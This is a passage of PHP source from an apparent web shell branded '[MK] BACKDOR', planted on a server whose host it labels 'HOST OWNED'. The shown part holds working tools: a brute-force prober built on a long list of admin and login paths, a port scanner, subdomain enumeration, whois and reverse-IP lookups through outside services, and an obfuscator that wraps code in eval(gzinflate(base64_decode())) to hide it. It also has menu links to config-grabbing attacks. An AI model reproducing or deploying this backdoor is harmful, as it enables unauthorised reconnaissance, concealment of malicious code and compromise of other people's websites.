  3228. '/login.php/',
  3229. '/adm/',
  3230. '/admin/',
  3231. '/admin/account.php/',
  3232. '/admin/login.php/',
  3233. '/admin/home/',
  3234. '/admin/controlpanel.php/',
  3235. '/admin/controlpanel.html/',
  3236. '/admin/cp/',
  3237. '/admin/adminLogin.php/',
  3238. '/admin/adminLogin.html/',
  3239. '/admin/admin_login/',
  3240. '/admin/controlpanel/',
  3241. '/admin/admin-login/',
  3242. '/admin-login/',
  3243. '/admin/account/',
  3244. '/admin/admin/',
  3245. '/admin.html/',
  3246. '/admin.php/',
  3247. '/adminitem/',
  3248. '/adminitems/',
  3249. '/administrator/',
  3250. '/administrator/login/',
  3251. '/administrator/',
  3252. '/administration/',
  3253. '/adminlogin/',
  3254. '/admin_area/admin/',
  3255. '/admin_area/',
  3256. '/admin_area/login/',
  3257. '/manager/',
  3258. '/letmein/',
  3259. '/superuser/',
  3260. '/access/',
  3261. '/sysadm/',
  3262. '/superman/',
  3263. '/supervisor/',
  3264. '/panel/',
  3265. '/control/',
  3266. '/member/',
  3267. '/members/',
  3268. '/user/',
  3269. '/cp/',
  3270. '/uvpanel/',
  3271. '/manage/',
  3272. '/management/',
  3273. '/signin/',
  3274. '/log-in/',
  3275. '/sign-in/',
  3276. '/users/',
  3277. '/accounts/',
  3278. '/wp-login.php/',
  3279. '/bb-admin/login/',
  3280. '/bb-admin/admin/',
  3281. '/bb-admin/admin.php/',
  3282. '/administrator/account/',
  3283. '/relogin.htm/',
  3284. '/relogin.php/',
  3285. '/check/',
  3286. '/relogin/',
  3287. '/blog/wp-login/',
  3288. '/user/admin/',
  3289. '/users/admin/',
  3290. '/registration/',
  3291. '/processlogin/',
  3292. '/checklogin/',
  3293. '/checkuser/',
  3294. '/checkadmin/',
  3295. '/isadmin/',
  3296. '/authenticate/',
  3297. '/authentication/',
  3298. '/auth/',
  3299. '/authuser/',
  3300. '/authadmin/',
  3301. '/modelsearch/login/',
  3302. '/moderator/',
  3303. '/controlpanel//',
  3304. '/admincontrol/',
  3305. '/adminpanel/',
  3306. '/fileadmin/',
  3307. '/sysadmin/',
  3308. '/admin1/',
  3309. '/admin1.php/',
  3310. '/admin2/',
  3311. '/admin2.php/',
  3312. '/yonetim/',
  3313. '/yonetim.php/',
  3314. '/yonetici/',
  3315. '/yonetici.php/',
  3316. '/myadmin/',
  3317. '/ur-admin/',
  3318. '/Server/',
  3319. '/wp-admin/',
  3320. '/administr8/',
  3321. '/webadmin/',
  3322. '/administratie/',
  3323. '/admins/',
  3324. '/administrivia/',
  3325. '/Database_Administration/',
  3326. '/useradmin/',
  3327. '/sysadmins/',
  3328. '/admin1/',
  3329. '/system-administration/',
  3330. '/administrators/',
  3331. '/pgadmin/',
  3332. '/DIRectadmin/',
  3333. '/staradmin/',
  3334. '/ServerAdministrator/',
  3335. '/SysAdmin/',
  3336. '/administer/',
  3337. '/LiveUser_Admin/',
  3338. '/sys-admin/',
  3339. '/typo3/',
  3340. '/panel/',
  3341. '/cpanel/',
  3342. '/cpanel_file/',
  3343. '/platz_login/',
  3344. '/rcLogin/',
  3345. '/blogindex/',
  3346. '/formslogin/',
  3347. '/autologin/',
  3348. '/support_login/',
  3349. '/meta_login/',
  3350. '/manuallogin/',
  3351. '/simpleLogin/',
  3352. '/loginflat/',
  3353. '/utility_login/',
  3354. '/showlogin/',
  3355. '/memlogin/',
  3356. '/login-reDIRect/',
  3357. '/sub-login/',
  3358. '/wp-login/',
  3359. '/login1/',
  3360. '/DIR-login/',
  3361. '/login_db/',
  3362. '/xlogin/',
  3363. '/smblogin/',
  3364. '/customer_login/',
  3365. '/UserLogin/',
  3366. '/login-us/',
  3367. '/acct_login/',
  3368. '/bigadmin/',
  3369. '/project-admins/',
  3370. '/phppgadmin/',
  3371. '/pureadmin/',
  3372. '/sql-admin/',
  3373. '/radmind/',
  3374. '/openvpnadmin/',
  3375. '/wizmysqladmin/',
  3376. '/vadmind/',
  3377. '/ezsqliteadmin/',
  3378. '/hpwebjetadmin/',
  3379. '/newsadmin/',
  3380. '/adminpro/',
  3381. '/Lotus_Domino_Admin/',
  3382. '/bbadmin/',
  3383. '/vmailadmin/',
  3384. '/Indy_admin/',
  3385. '/ccp14admin/',
  3386. '/irc-macadmin/',
  3387. '/banneradmin/',
  3388. '/sshadmin/',
  3389. '/phpldapadmin/',
  3390. '/macadmin/',
  3391. '/administratoraccounts/',
  3392. '/admin4_account/',
  3393. '/admin4_colon/',
  3394. '/radmind-1/',
  3395. '/Super-Admin/',
  3396. '/AdminTools/',
  3397. '/cmsadmin/',
  3398. '/SysAdmin2/',
  3399. '/globes_admin/',
  3400. '/cadmins/',
  3401. '/phpSQLiteAdmin/',
  3402. '/navSiteAdmin/',
  3403. '/server_admin_small/',
  3404. '/logo_sysadmin/',
  3405. '/power_user/',
  3406. '/system_administration/',
  3407. '/ss_vms_admin_sm/',
  3408. '/bb-admin/',
  3409. '/panel-administracion/',
  3410. '/instadmin/',
  3411. '/memberadmin/',
  3412. '/administratorlogin/',
  3413. '/adm/',
  3414. '/admin_login/',
  3415. '/panel-administracion/login/',
  3416. '/pages/admin/admin-login/',
  3417. '/pages/admin/',
  3418. '/acceso/',
  3419. '/admincp/login/',
  3420. '/admincp/',
  3421. '/adminarea/',
  3422. '/admincontrol/',
  3423. '/affiliate/',
  3424. '/adm_auth/',
  3425. '/memberadmin/',
  3426. '/administratorlogin/',
  3427. '/modules/admin/',
  3428. '/administrators/',
  3429. '/siteadmin/',
  3430. '/adminsite/',
  3431. '/kpanel/',
  3432. '/vorod/',
  3433. '/adminpanel/',
  3434. '/PSUser/',
  3435. '/secure/',
  3436. '/webmaster/',
  3437. '/autologin/',
  3438. '/userlogin/',
  3439. '/admin_area/',
  3440. '/cmsadmin/',
  3441. '/security/',
  3442. '/usr/',
  3443. '/root/',
  3444. '/secret/',
  3445. '/admin/login/',
  3446. '/admin/adminLogin/',
  3447. '/moderator.php/',
  3448. '/moderator/login/',
  3449. '/moderator/admin/',
  3450. '/yonetici/',
  3451. '/admin/',
  3452. '/manager/',
  3453. '/aadmin/',
  3454. '/cgi-bin/login/',
  3455. '/login1/',
  3456. '/login_admin/',
  3457. '/login_out/',
  3458. '/login_user/',
  3459. '/loginerror/',
  3460. '/loginok/',
  3461. '/loginsave/',
  3462. '/loginsuper/',
  3463. '/login/',
  3464. '/logout/',
  3465. '/secrets/',
  3466. '/super1/',
  3467. '/super_index/',
  3468. '/super_login/',
  3469. '/supermanager/',
  3470. '/superman/',
  3471. '/superuser/',
  3472. '/supervise/',
  3473. '/supervise/Login/',
  3474. '/super/',
  3475. '/p/m/a/',
  3476. '/dev/',
  3477. '/webadmin/',
  3478. '/sqlweb/',
  3479. '/websql/',
  3480. '/webdb/',
  3481. '/mya/',
  3482. '/myadmin/',
  3483. '/server/',
  3484. '/db/',
  3485. '/configuration/',
  3486. '/configure/',
  3487. '/administrator/',
  3488. '/moderator/',
  3489. '/controlpanel/',
  3490. '/adminpanel/',
  3491. '/admincontrol/',
  3492. '/fileadmin/',
  3493. '/data/',
  3494. '/postgresql/',
  3495. '/oracle/',
  3496. '/msssql/',
  3497. '/msaccess/',
  3498. '/sysadmin/',
  3499. '/serverdata/',
  3500. '/admins/',
  3501. '/Database_Administration/',
  3502. '/useradmin/',
  3503. '/sysadmins/',
  3504. '/admin1/',
  3505. '/system-administration/',
  3506. '/administrators/',
  3507. '/pgadmin/',
  3508. '/DIRectadmin/',
  3509. '/staradmin/',
  3510. '/ServerAdministrator/',
  3511. '/SysAdmin/',
  3512. '/LiveUser_Admin/',
  3513. '/sys-admin/',
  3514. '/typo3/',
  3515. '/panel/',
  3516. '/xlogin/',
  3517. );
  3518. if(isset($site)){
  3519. foreach($list as $path => $test) {
  3520. $Inject = curl_init();
  3521. curl_setopt($Inject, CURLOPT_RETURNTRANSFER, 1);
  3522. curl_setopt($Inject, CURLOPT_HEADER, 1);
  3523. curl_setopt($Inject, CURLOPT_URL, $site.$test);
  3524. $result = curl_exec($Inject);
  3525. curl_close($Inject);
  3526. //print $url;
  3527. if (preg_match("/200 OK/", $result)){
  3528. echo "<br>[<b><span style='color:#0000F0'>&check;</span></b> DONE! : </span><a target=_white ><span style='color:red'>$site$test </span>]</span>";
  3529. }
  3530. else       if (preg_match("/401 Unauthorized/", $result)) {
  3531. echo "<br>[<b><span style='color:#0000F0'>&check;</span></b>
  3532. DONE! : </span><<a target=_white href='$site$test'>$site$test </a></span></span>";
  3533. }
  3534. }
  3535. echo "<center><br><b><span style='color:#0000F0'>&check; SCAN FINISHED </span></b></center><br>";
  3536. }
  3537. exit;
  3538. }
  3539. if ($_GET['Mister'] == 'whois') {
  3540. echo '<br><center><nav class="social"><ul>
  3541. <li><a href="?Mister=FinderAdmin">Finder Administer Panel V1.0</a></li>
  3542. <li><a href="?Mister=Domains">Get All Domains</a></li>
  3543. <li><a href="?Mister=Finder">Finder Database Panel</a></li>
  3544. <li><a href="?Mister=Getip">Get Ip 2 Domains </a></li>
  3545. <li><a href="?Mister=subdomain">Subdomain Checker</a></li>
  3546. <li><a href="?Mister=iplookdom">Ip Lookup Reverse</a></li>
  3547. <li><a href="?Mister=Rev">Mass Read Config </a></li>
  3548. <li><a href="?Mister=Grabber">Grabber Config Attack</a></li>
  3549. <li><a href="?Mister=J-Scann3r">Joomla Serv3r Scann3r</a></li>
  3550. <li><a href="?Mister=whois">Website Whois</a></li>
  3551. </ul></nav></center>
  3552. ';
  3553. echo "<br><nav class='Mister-nav'><center><span style='font-size:18px;color:#0000F0;'>WEBSITE WHOIS</span></nav><center><br><div class='content'>";
  3554. @set_time_limit(0);
  3555.    @error_reporting(0);
  3556.    function sws_domain_info($site)
  3557.    {
  3558.    $getip = @file_get_contents("http://networktools.nl/whois/$site");
  3559.    flush();
  3560.    $ip = @findit($getip,'<pre>','</pre>');
  3561.    return $ip;
  3562.    flush();
  3563.    }
  3564.    function sws_net_info($site)
  3565.    {
  3566.    $getip = @file_get_contents("http://networktools.nl/asinfo/$site");
  3567.    $ip = @findit($getip,'<pre>','</pre>');
  3568.    return $ip;
  3569.    flush();
  3570.    }
  3571.    function sws_site_ser($site)
  3572.    {
  3573.    $getip = @file_get_contents("http://networktools.nl/reverseip/$site");
  3574.    $ip = @findit($getip,'<pre>','</pre>');
  3575.    return $ip;
  3576.    flush();
  3577.    }
  3578.    function sws_sup_dom($site)
  3579.    {
  3580.    $getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=".$site."&Search+subdomains=Find+subdomains");
  3581.    $ip = @findit($getip,'<strong>Nameservers found:</strong>','<script type="text/javascript">');
  3582.    return $ip;
  3583.    flush();
  3584.    }
  3585.    function sws_port_scan($ip)
  3586.    {
  3587.    $list_post = array('80','21','22','2082','25','53','110','443','143');
  3588.    foreach ($list_post as $o_port)
  3589.    {
  3590.    $connect = @fsockopen($ip,$o_port,$errno,$errstr,5);
  3591.    if($connect)
  3592.    {
  3593.    echo " $ip : $o_port ??? <u style=\"color: #0000F0\">OPEN</u> <br>";
  3594.    flush();
  3595.    }
  3596.    }
  3597.    }
  3598.    function findit($mytext,$starttag,$endtag) {
  3599.    $posLeft = @stripos($mytext,$starttag)+strlen($starttag);
  3600.    $posRight = @stripos($mytext,$endtag,$posLeft+1);
  3601.    return @substr($mytext,$posLeft,$posRight-$posLeft);
  3602.    flush();
  3603.    }
  3604.    ?>
  3605. <center>
  3606. <br>
  3607. <form method="post"><table>
  3608.     <tr><td>SITE TO SCAN </td><td>:</td><td><input type="text" name="site" size="50" style="color:#0000F0;background-color:#000000" class="inputz" value="<?php echo "".$_SERVER['HTTP_HOST']."";?>" /> <br><input class="Mister-button" type="submit" name="scan" value="SCAN !" />
  3609. </table></form>
  3610. <?php
  3611.    if(isset($_POST['scan']))
  3612.    {
  3613.    $site = @htmlentities($_POST['site']);
  3614.    if (empty($site)){die('<br style="color:red;"> NOT ADD IP...... !');}
  3615.    $ip_port = @gethostbyname($site);
  3616.    echo "
  3617.   <br style='color:#FFFFFF;'> SCANNING [ $site IP $ip_port ] ...
  3618.   <br>|-------------- PORT SERVER ------------------| <br>";
  3619.    echo "<pre style='color:#0000F0;'>".sws_port_scan($ip_port)." </pre> ";
  3620.    flush();
  3621.    echo "<br>|-------------- DOMAIN INFO ------------------| <br>
  3622.   <pre style='color:#0000F0;'>".sws_domain_info($site)."</pre>";
  3623.    flush();
  3624.    echo "
  3625.    <br>|-------------- NETWORK INFO ------------------| <br />
  3626.   <pre style='color:#0000F0;'>".sws_net_info($site)."</pre> ";
  3627.    flush();
  3628.    echo "<br>|-------------- SUBDOMAINS SERVER ------------------| <br />
  3629.   <pre style='color:#0000F0;'>".sws_sup_dom($site)."</pre> ";
  3630.    flush();
  3631.    echo "<br>|-------------- SITE SERVER ------------------| <br />
  3632.   <pre style='color:#0000F0;'>".sws_site_ser($site)."</pre>
  3633.    <br> |-------------- END ------------------| <br />";
  3634.    flush();
  3635.    }
  3636.    echo '</center>';
  3637.  
  3638. $FOTTER2 = "<footer class='MK-footer'>";  
  3639. echo ''. $FOTTER2 .'' ;
  3640. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  3641. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  3642. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  3643. $SERVERIP1 = "SERVER IP :";
  3644. echo ''. $SERVERIP1 .'' ;
  3645. $SPAN2 = "<span style='color:#FFFFFF;'>";
  3646. $SPAN3 = "</span>";
  3647. echo ''. $SPAN2 .'' ;
  3648. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  3649. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  3650. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  3651. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  3652. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  3653. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  3654. $HOSTOWNED1 = "HOST OWNED :";
  3655. echo ''. $HOSTOWNED1 .'' ;
  3656. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  3657. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  3658. echo ''. $REPORTERROR .'</a></span></footer>';
  3659. echo ''. $THEEND .'' ;
  3660. exit;
  3661. }
  3662. //////////// GETIP
  3663. if ($_GET['Mister'] == 'Getip') {
  3664. echo "<br><center><nav class='social'><ul>
  3665. <li><a href='?Mister=FinderAdmin'>Finder Administer Panel V1.0</a></li>
  3666. <li><a href='?Mister=Domains'>Get All Domains</a></li>
  3667. <li><a href='?Mister=Finder'>Finder Database Panel</a></li>
  3668. <li><a href='?Mister=Getip'>Get Ip 2 Domains </a></li>
  3669. <li><a href='?Mister=subdomain'>Subdomain Checker</a></li>
  3670. <li><a href='?Mister=iplookdom'>Ip Lookup Reverse</a></li>
  3671. <li><a href='?Mister=Rev'>Mass Read Config </a></li>
  3672. <li><a href='?Mister=Grabber'>Grabber Config Attack</a></li>
  3673. <li><a href='?Mister=J-Scann3r'>Joomla Serv3r Scann3r</a></li>
  3674. <li><a href='?Mister=whois'>Website Whois</a></li>
  3675. </ul></nav></center>";
  3676. echo "<nav class='Mister-nav'><center><span style='font-size:18px;  color:#0000F0'>GET DOMAINS 2 IP</span></nav><br><center>";
  3677. ?>
  3678. <table align='center' width='50%' ></td><td><form method='post' ><br>
  3679. <span style='color:white'><center>LISTE URL :</span><center>
  3680. <textarea cols='50' rows='12' name='site2ip' class='input' style='height:100px;'><?php echo "".$_SERVER['HTTP_HOST']."";?> </textarea></br><br>
  3681. <input type='submit' value='EXTRACT' name='w2ip' class='Mister-button'>
  3682. <br></center></table></table></center>
  3683. <?php
  3684. if(isset($_POST['site2ip'])){
  3685. foreach(explode("\n",$_POST['site2ip']) as $site4ip){
  3686. $ipp=trim($site4ip);
  3687. echo '<br><center>
  3688. <span style="color:#FFFFFF">NAME HOST : </span>'.$ipp.'
  3689. <br><span style="color:#FFFFFF">  IP HOST : </span>'.gethostbyname ($ipp).'</center><br>';
  3690. }
  3691. }
  3692. echo "<br>";$FOTTER2 = "<footer class='MK-footer'>";  
  3693. echo ''. $FOTTER2 .'' ;
  3694. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  3695. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  3696. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  3697. $SERVERIP1 = "SERVER IP :";
  3698. echo ''. $SERVERIP1 .'' ;
  3699. $SPAN2 = "<span style='color:#FFFFFF;'>";
  3700. $SPAN3 = "</span>";
  3701. echo ''. $SPAN2 .'' ;
  3702. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  3703. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  3704. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  3705. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  3706. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  3707. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  3708. $HOSTOWNED1 = "HOST OWNED :";
  3709. echo ''. $HOSTOWNED1 .'' ;
  3710. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  3711. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  3712. echo ''. $REPORTERROR .'</a></span></footer>';
  3713. echo ''. $THEEND .'' ;
  3714. exit;}
  3715. //////////// SUBDOMAIN
  3716. if ($_GET['Mister'] == 'subdomain'){
  3717. echo "<br><center><nav class='social'><ul>
  3718. <li><a href='?Mister=FinderAdmin'>Finder Administer Panel V1.0</a></li>
  3719. <li><a href='?Mister=Domains'>Get All Domains</a></li>
  3720. <li><a href='?Mister=Finder'>Finder Database Panel</a></li>
  3721. <li><a href='?Mister=Getip'>Get Ip 2 Domains </a></li>
  3722. <li><a href='?Mister=subdomain'>Subdomain Checker</a></li>
  3723. <li><a href='?Mister=iplookdom'>Ip Lookup Reverse</a></li>
  3724. <li><a href='?Mister=Rev'>Mass Read Config </a></li>
  3725. <li><a href='?Mister=Grabber'>Grabber Config Attack</a></li>
  3726. <li><a href='?Mister=J-Scann3r'>Joomla Serv3r Scann3r</a></li>
  3727. <li><a href='?Mister=whois'>Website Whois</a></li>
  3728. </ul></nav></center>";
  3729. echo "<nav class='Mister-nav'><center><span style='font-size:18px;  color:#0000F0'>SUBDOMAIN CHECKER</span></nav><center>";
  3730. ?>
  3731. <br><form method="post">
  3732. <span style="font-size:10px;color:#FFFFFF;"><center>URL :</center></span>
  3733. <input type="text" name="site" size="30" value="<?php echo "".$_SERVER['HTTP_HOST']."";?>" style="width:40%" class="input"><br><br>
  3734. <input name="submit"  type="submit" value="SUBMIT" class="Mister-button"><br><br>
  3735. </form>
  3736. </font>
  3737. <?php
  3738. set_time_limit(0);
  3739. $subs = array("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","lan","phpmyadmin","administrator","mape","isp","shop","rex","podcast","potraga","sensation","igre","foo","api","access","ulaz","pam","sport","pretraga","pricaonica","kuvar","raketa","wwwmobile","s1","s2","foro","s3","box","open","abc","phpbb3","phpbb2","internet","phpbb","whm","mysql","webadmin","adm","admin","admins","agent","aix","recnik","alerts","av","antivirus","app","apps","appserver","archive","as400","auto","backup","banking","bbdd","bbs","bea","beta","blog","catalog","cgi","channel","channels","chat","cisco","client","clients","club","cluster","clusters","code","commerce","community","compaq","conole","consumer","contact","contracts","corporate","ceo","cso","cust","customer","cpanel","data","bd","db2","default","demo","cms","design","desktop","dev","develop","developer","device","dial","digital","DIR","DIRectory","disc","discovery","disk","dns","dns1","dns2","dns3","docs","poslovi","prijemni","znanje","mojtim","documents","domain","domains","dominoweb","download","downloads","ecommerce","e-commerce","edi","edu","education","email","enable","engine","engineer","enterprise","slike","galerija","error","event","events","example","exchange","extern","external","extranet","fax","field","finance","firewall","forum","forums","fsp","ftp","ftp2","fw","fw1","gallery","galleries","games","gateway","gopher","guest","gw","hello","helloworld","help","helpdesk","arkiva","lajme","faqe","helponline","hp","ibm","ibmdb","ids","ILMI","film","navigator","nalog","prodavnica","zdravlje","reklamiranje","zivot","images","imap","pomoc","imap4","img","imgs","info","intern","internal","intranet","invalid","iphone","ipsec","irc","ircserver","jobs","ldap","link","linux","lists","listserver","local","localhost","log","logs","login","lotus","mail","mailboxes","mailhost","result","management","manage","manager","map","maps","marketing","device","media","member","members","messenger","mngt","mobile","monitor","multimedia","music","my","names","lojra","albania","bisedo","puka","foto","emra","njohje","vip","egea-tirana","historia","forumi","vesti","administracija","net","new1","new","perkohesisht","netdata","netstats","network","news","nms","nntp","ns","ns1","ns2","ns3","ntp","online","openview","oracle","outlook","page","pages","partner","partners","pda","personal","ph","pictures","pix","pop","pop3","portal","press","print","printer","private","project","projects","proxy","public","ra","radio","raptor","ras","read","register","remote","report","reports","root","router","lister","rwhois","sac","schedules","scotty","search","secret","secure","security","seri","serv","serv2","server","service","services","shop","shopping","site","sms","smtp","smtphost","snmp","snmpd","snort","solaris","1","2","3","4","5","6","7","8","9","0","solutions","support","source","sql","ssl","stats","store","stream","streaming","sun","support","switch","sysback","system","tech","terminal","test","testing","testing123","time","tivoli","training","transfers","uddi","update","upload","uploads","video","vpn","w1","w2","w3","wais","wap","web","webdocs","weblib","weblogic","webmail","webserver","webservices","websphere","whois","wireless","work","world","write","ws","ws1","ws2","ws3","www1","www2","www3","www4","www5","www6","www7","www8","www9","drupal","wordpress","joomla","db","database","love");
  3740. if($_POST){
  3741. $url = $_POST["site"];
  3742. foreach($subs as $sub){
  3743. if(!eregi($url, gethostbyname($sub.".".$url))){
  3744. echo '<font face="Narkisim" color="white">[+] '.$sub.".".$url.' : </font><font color="#0000F0">'.gethostbyname($sub.".".$url).'</font></br>';
  3745. }else{
  3746. echo '<span style="font-size:10px;  color:white">'.$sub.".".$url.' </span>: <span style="font-size:10px;color:#f60000">NOTHING FOUND</spane><br><br>';
  3747. }
  3748. }
  3749. }
  3750. echo "<br>";$FOTTER2 = "<footer class='MK-footer'>";  
  3751. echo ''. $FOTTER2 .'' ;
  3752. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  3753. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  3754. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  3755. $SERVERIP1 = "SERVER IP :";
  3756. echo ''. $SERVERIP1 .'' ;
  3757. $SPAN2 = "<span style='color:#FFFFFF;'>";
  3758. $SPAN3 = "</span>";
  3759. echo ''. $SPAN2 .'' ;
  3760. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  3761. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  3762. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  3763. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  3764. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  3765. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  3766. $HOSTOWNED1 = "HOST OWNED :";
  3767. echo ''. $HOSTOWNED1 .'' ;
  3768. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  3769. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  3770. echo ''. $REPORTERROR .'</a></span></footer>';
  3771. echo ''. $THEEND .'' ;
  3772. exit;}
  3773. ////////////
  3774. if ($_GET['Mister'] == 'string'){$text = $_POST['code'];
  3775. echo '<br><center><nav class="social"><ul>
  3776. <li><a href="?Mister=string">Encoder</a></li>
  3777. <li><a href="?Mister=Base64Cry">Base64 Decrypt V2.0</a></li>
  3778. <li><a href="?Mister=obfuscate">Php Obfuscate</a></li>
  3779. <li><a href="?Mister=HashId">Hash Identification</a></li>
  3780. </ul></nav></center>';
  3781. ?>
  3782. <nav class='Mister-nav'><center><span style='font-size:18px;  color:#0000F0'>ENCODER</span></nav><br><div class=content><center><span style='font-size:10px;color:white'>MD5 / BASE64 / CRYPT / URL Encoding / SHA256 / MD4</span><center>
  3783. <center><br>
  3784. <table align='center'  style="width:50%;"></td><td>
  3785. <form method="post"><br><textarea cols=80 rows=5 name="code" class="input" style="height:100px; width:100%;">MKV3.2</textarea><br><br><select  name="ope"><option value="base64">BASE64</option><option value="md5">MD5</option><option value="whash">CRYPT</option><option value="SHA1">SHA1</option><option value="urlencode">URL Encoding</option><option value="md4">MD4</option><option value="SHA256">SHA256</option></select>&nbsp;<input type='submit' value='ENCRYPT' class="Mister-button"></form><?php $op = $_POST["ope"];switch ($op) {case 'base64': $codi=base64_encode($text);break;case 'md5' : $codi=md5($text);break;case 'whash' : $codi=crypt($text);break;case 'SHA1' : $codi=sha1($text);break;case 'urlencode' : $codi=urlencode($text);break;case 'md4' : $codi=hash("md4",$text);break;case 'SHA256' : $codi=hash("sha256",$text);break;default:break;}echo '<textarea cols=80 rows=10 class="input" style="height:100px; width:100%;" readonly>'.$codi.'</textarea></div></center>';
  3786. $FOTTER2 = "<footer class='MK-footer'>";  
  3787. echo ''. $FOTTER2 .'' ;
  3788. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  3789. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  3790. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  3791. $SERVERIP1 = "SERVER IP :";
  3792. echo ''. $SERVERIP1 .'' ;
  3793. $SPAN2 = "<span style='color:#FFFFFF;'>";
  3794. $SPAN3 = "</span>";
  3795. echo ''. $SPAN2 .'' ;
  3796. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  3797. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  3798. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  3799. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  3800. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  3801. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  3802. $HOSTOWNED1 = "HOST OWNED :";
  3803. echo ''. $HOSTOWNED1 .'' ;
  3804. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  3805. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  3806. echo ''. $REPORTERROR .'</a></span></footer>';
  3807. echo ''. $THEEND .'' ;
  3808. exit;}
  3809. if ($_GET['Mister'] == 'obfuscate') {
  3810. echo '<br><center><nav class="social"><ul>
  3811. <li><a href="?Mister=string">Encoder</a></li>
  3812. <li><a href="?Mister=Base64Cry">Base64 Decrypt V2.0</a></li>
  3813. <li><a href="?Mister=obfuscate">Php Obfuscate</a></li>
  3814. <li><a href="?Mister=HashId">Hash Identification</a></li>
  3815. </ul></nav></center>
  3816. ';?>
  3817. <nav class='Mister-nav'><center><span style='font-size:18px;  color:#0000F0'>PHP OBFUSCATE</span></nav><br><div class=content><center><span style='font-size:10px;color:white'>TYPE CODE PHP</span><center>
  3818. <?php
  3819. if ( isset($_POST['code']) &&
  3820. $_POST['code'] != '')
  3821. {
  3822. $encoded = base64_encode(gzdeflate(trim(stripslashes($_POST['code'].' '),'<?php,?>'),9)); // high Compression! :P
  3823.         $encode = '
  3824. <?php
  3825. $encoded = \''.$encoded.'\';
  3826. eval(gzinflate(base64_decode($encoded)));
  3827. ///// SCRIPT ENCODED BY [MK] BACKDOR
  3828. ///// CODED BY MISTER KLIO TWITTER @MCAZEDIINE
  3829. ?>
  3830. ';
  3831. }
  3832. else
  3833. {
  3834. $encode = 'PLEASE ENTER YOUR CODE! AND CLICK SUBMIT! :)';    
  3835. }
  3836. ?>
  3837. <center><form method="POST" style="width:80%;">
  3838. <textarea cols="100" rows="20" name="code"><?php echo $encode;?></textarea><br />
  3839. <input class="Mister-button" type="submit" value="ENCODER"/>
  3840. </form></center>
  3841. <?php
  3842. $FOTTER2 = "<footer class='MK-footer'>";  
